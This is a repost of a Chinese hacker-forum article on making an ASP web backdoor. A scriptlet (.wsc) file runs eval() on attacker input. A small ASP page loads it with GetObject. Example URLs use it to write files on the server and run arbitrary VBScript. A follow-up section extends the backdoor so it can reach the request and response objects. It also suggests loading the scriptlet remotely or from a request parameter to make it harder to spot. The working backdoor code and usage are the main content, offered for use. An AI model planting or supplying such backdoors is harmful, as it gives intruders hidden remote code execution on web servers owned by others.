利用wsc来做一个asp后门及后续

安全 黑客攻防
利用wsc来做一个asp后门及后续……

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀:

以下是引用片段:







sub lcx(b)
eval(b)

end sub
]]>


backdoor.asp内容如下:

以下是引用片段:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

调用方法如下:

以下是引用片段:
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意这里的a=只能是vbs的代码,不可以接受像response、request之类的asp的东东。如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服务器中不可以。算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
#p#

突然看到了lcx巨形牛头人发了一个帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛头人所说的,没有加进request和response类很不爽。于是我作了一个简单的修改。

ScriptCodingInfo.wsc 代码

以下是引用片段:







sub lcx(b,a,c)
set response=c ’加入request和response进来。就可以直接调用了
set request=a ’修改 by:phpeval.cn
eval(b)
end sub
]]>


test.asp代码:

<% 
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx b,request,response
%>

测试方法:

以下是引用片段:
http://phpeval.cn/test.asp?a=execute
("response.write(request(""c"")):response.end")&c=phpeval

不知道这是不是lcx巨形牛头人所说的那个c端。我一直不太理解“能够直接调用cs的asp木马的c端就好了”lcx巨牛的这句话的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段:
http://phpeval.cn/test.asp?a=execute("response.write(request(""c""))
:response.end")&b=script:d:/web/wwwroot/ScriptCodingInfo.
wsc%23haiyangtop&c=phpeval

这样好象更有诱惑性。

【编辑推荐】

  1. 4.1.7 使用SQLRootKit网页数据库后门控制案例
  2. 入侵Windows2000系统放置后门的方法
  3. Linux下的后门和日志工具
责任编辑:佚名 来源: 黑客风云
相关推荐

2011-12-20 10:02:01

ASP.NET

2015-07-03 11:27:30

程序员自己神器

2012-12-17 12:58:18

WebjQuery重构

2017-06-30 15:18:24

对账系统互联网

2019-09-10 09:12:54

2016-11-23 18:13:44

javascriptrxjsreactivex

2011-02-28 09:22:47

SQLite记账簿

2018-01-04 16:04:35

圆环放大动画

2021-12-17 10:06:42

鸿蒙HarmonyOS应用

2020-05-26 10:38:51

安全 黑客Windows

2017-06-19 08:30:35

大数据数据可视化报表

2019-04-22 10:25:52

程序员技术职场

2020-07-20 10:00:52

Python翻译工具命令行

2021-12-01 07:02:55

Python 记录器按键

2014-04-29 10:50:16

池建强

2018-06-08 16:18:43

Python微信聊天机器人

2021-12-19 22:00:31

APP软件开发开发

2022-03-30 15:11:26

Python房价工具

2011-10-27 21:13:28

2014-07-22 10:00:18

程序员
点赞
收藏

51CTO技术栈公众号